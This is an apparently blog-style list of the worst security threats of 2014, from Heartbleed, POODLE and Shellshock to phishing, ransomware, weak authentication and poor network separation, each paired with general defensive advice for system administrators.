2014 was another banner year for security events, with hacks of major financial institutions and retailers leading the way in notoriety, but other more critical services just behind. In addition to breaches of information, we also saw several disturbing events that rocked the core of Internet security, privacy and infrastructure. The only thing more disturbing than the hacks is how they now have become so commonplace that many people just shrug their shoulders and consider this the new normal.
As 2014 draws to a close, let’s take a look back at the 26 worst security threats of 2014.
The OpenSSL implementation of SSL turned out to have a vulnerability in the heartbeat that enables SSL sessions to be kept open, which could lead to information disclosure, including in some cases the session keys which could then be used to decrypt all data in the session. OpenSSL was quickly patched, but Sysadmins are still struggling to get all systems up to date nine months later.
Less renowned but no less impactful, the Poodle vulnerability in SSL 3.0 allows attackers to decrypt data, again including session keys which can then lead to decrypting all data in transit using that session key. Many organizations have disabled SSL 3.0, but it is still out there.
Multiple vulnerabilities in the Bash shell were announced in September. Popular in Linux, Unix, OS X, and across dozens of major vendors’ network gear, the vulnerabilities enable attackers to execute commands remotely on affected devices. The potential impact of this is devastating when the core networking components of practically all networks include systems vulnerable to this. Vendors are still working on releasing updates for all the impacted systems three months later. These include
4. Unpatched Operating Systems
Until vendors make operating systems that self-patch and which cannot be stopped (not unlike browsers are starting to behave,) unpatched operating systems will continue to be a threat, or rather, vulnerable to myriad threats. Since a compromised operating system connected to your network gives attackers a foothold in, it becomes a threat to the rest of your network. Whether it’s a server in the data center or a laptop that comes in from the cold, if it’s not current on all its patches, it’s a threat the rest.
5. Unpatchable Operating Systems
Have you heard that Disney song by Idina Menzel from Frozen,”Let It Go?” She’s singing about Windows XP, older unsupported versions of iOS and Mac OS X, and any other operating system or firmware that is no longer supported by the vendor. If you cannot patch it, get rid of it, because you know that attackers are continuing to look for ways to exploit what cannot be patched.
6. Adobe applications
We use PDFs six of every seven days of the week, and Flash is still prevalent (perhaps even dominant) on the web. But if you take a quick run at 2014’s most impactful vulnerabilities as rated by MITRE, most of the CVEs scoring 10s are for Adobe products. Does that mean you should stop using them? Of course not. But it does mean that you need to patch those things just as frequently as you do your operating systems, and you’d better get a patch management application that can handle this for you, because manually upgrading Acrobat on all your workstations every month is no easy task.
You could almost call this section ‘legacy applications’, since the only reason most companies still have IE8 (or earlier) around is because of some lame ERP application that just won’t work with a current version browser. However, it’s not really the app that is the threat… it’s all the compromised web sites and malicious code that users will access with the old browser. If you must keep IE8 around, consider virtualizing it and setting it up so it can only access your legacy apps, and get a current version browser on the desktop. And you really should check out IE11 in Enterprise Mode. You’d be surprised at how well it will work with most legacy ERPs.
8. Older Office suites
Just as XP and IE8 should go the way of the dinosaurs, so should older versions of the Office suites. Office 2007 is still in extended support, so it at least gets security updates, but anything older than the last SP for 2007 (SP3) should be dumped.
9. Advanced persistent threat
More a class of threat than any one specific threat, APT is going to continue to grow in prominence and impact pretty much from now until the end of time. The long running, orchestrated and focused attacks may take months to pay off, but when they do, the attacker owns the attacked. If you are not tirelessly vigilant in your patching and configurations, APT attackers will eventually find a way in.
Downloads, malicious websites, infected attachments in email, or the more traditional attack vectors like infected files on network shares; however malware gets in, once it infects a machine you really have no better option than to dust off and nuke it from high orbit! As long as there are computers, there will be malware, and the best thing you can do is ensure that 100% of your systems run antimalware and update multiple times per day. Have real-time scanning enabled, and run scheduled scans at least weekly.
Arguably the most insidious form of malware is ransomware. This malware takes the victim’s data and encrypts it, then holds the data for ransom. Pay off the attacker, and you might get the decryption keys to recover your files, or you might find your account emptied out.
12. Phishing attacks
Phishing attacks, and the more targeted spear phishing attacks, go after users’ financial information, credentials, and more. They use social engineering to get out of the user what they should know better than to reveal, but they continue to be an effective attack against individuals and businesses.
13. Single factor authentication
Account compromise can so easily be prevented by using strong, unique credentials and requiring a second factor of authentication, like a token, certificate, mobile app, or even a text message. The threat is that too few banks, emails services, or other service providers offer this option, fewer still require it, and most make it too difficult for regular users to use. This leaves everyone open to account compromise from an attacker who either grabs creds from another site, or just makes a lucky guess.
14. No encryption for data at rest
The threat is data theft, leakage and loss. It comes from data that is physically accessible. Laptops, portable disks, tapes, tablets, mobile phones, and thumb drives all tend to grow wings and fly away. The data stored on these errant devices could so easily be protected by encryption, but too few companies require encryption, and only enterprise operating systems come with the capability by default. Enterprises should make encryption 100% mandatory, and operating systems for consumers should offer easy to use encryption for all removable and fixed media out of the box.
15. No encryption for data in transit
Similar to above, the threats come from information leakage and violations of privacy. For any access to any system over the network, encryption should be the rule. Even when such data is neither confidential nor requiring integrity, encryption provides privacy for users and practically every protocol in use today offers an encrypted version.
16. USB devices
Unknown/untrusted/even shrink-wrapped USB devices can present threats to your systems. The recently released BadUSB attack enables an attacker to load custom firmware on USB thumb drives, mice, and keyboards that can execute malware at boot-up. Endpoint protection is a must for enterprises, as well as secure configurations that scan all devices upon connection, but also prevent boot from USB unless explicitly set to do so.
End users are scrambling to use their shiny new unmanaged mobile phones, tablets and home PCs to access corporate data. Often, this charge is led by executives who have enough authority to overrule security. But how can you protect against threats from devices you cannot control? Ensuring that BYOD devices only have network access on isolated segments, securing your apps so that they are designed for secure access, and enforcing two-factor authentication can help you reduce the risk from BYOD. Implementing technologies that provide you some degree of management over even BYOD devices, such as MDM, can further protect you from the threats presented by so many personally owned devices.
18. Stolen credentials
Whether credentials are stolen through phishing, social engineering, shoulder surfing or cleartext interception, once an attacker has someone’s credentials they have a foothold that can be used to launch more attacks, gain access to data, or log on to other sites and applications where the user set up the same credentials. One valid username/password pair can provide an attacker with access to dozens of other systems, where the only common element is the victim uses both. The best thing you can do for your customers and your users is to deploy two-factor authentication.
19. Stolen email addresses and passwords
Because so many people use their email address as their username, and the same password on site after site, compromises of one site can easily lead to compromises of other sites. If you use the same username and password on your email as you do at your bank and some social networking site, a compromise of one can easily lead to a compromise of all. Do you think a dating site has the same level of security and attention to patching and configuration as your credit card company does? Use unique credentials on different systems, and take advantage of two-factor authentication on every system that offers it.
20. Stolen personal data
When companies lose customer or employee personal data, the threat to people’s financial data and credit history is significant, but the threat to the company responsible for protecting that data goes much further than that. The loss of consumer confidence and repeat business is one thing, but the costs of providing credit monitoring to the victims can be huge, and recent ruling related to the Target breach means that banks can now sue Target to recoup their losses related to both fraudulent transactions and the costs of replacing all those credit and debit cards. Target is going to feel the impact of this breach for years to come.
21. Excessive rights
Too many companies ignore the principle of least privilege, and the threats presented by users with more rights than they need, can be extreme. Data loss can occur when users cut instead of copy, or delete data that they think only they access. When users are local admins on their systems, malware has a much better chance of gaining control of their systems.
22. Stale accounts
Stale accounts can be used by former employees, including admins, to gain unauthorized access to systems long after their right to do so has passed. Companies that don’t review all accounts on all their systems, and disable or delete those no longer needed, run the risk of these accounts being used for inappropriate access.
23. No logging
Security incidents will occur. That’s a fact. When companies don’t log, or don’t log in sufficient detail, or review the logs that they keep, they run the risk of these incidents going undetected for months. Many of the most significant breaches of 2014 went on for weeks, and some apparently started in 2013 and went unnoticed until it was far too late.
24. Default credentials
Routers, access points, applications and printers, to name but a few, can come with administrative accounts with well-published default credentials. If sysadmins do not reset these default credentials as a part of initial system configuration, they provide attackers with an easy way to compromise systems which can provide them with additional access.
25. No separation of networks
One thing became clear during 2014. Too many retailers have little to no separation between their general networks and their point of sale systems. In numerous cases, attackers gained access to the companies’ networks over the Internet, and from there they could get to PoS systems and credit card terminals. If you have high-value targets that do not need complete network access to function, firewall them off from the general network to reduce the threats.
26. End users
The last entry on our list must first be remembered as the reasons we have jobs. No end users, no need for sysadmins, so cut them some slack, but also remember that they are potentially the biggest threat we’ll face. They are human, they are not technical, and if we don’t provide them with protections and training, we cannot expect anything other than that end user mistakes will lead to security incidents. Help your users help you by providing them with the tools, training, policies, and explanations to enable them to work securely and safely and you’ll help mitigate almost every one of the other threats on this list.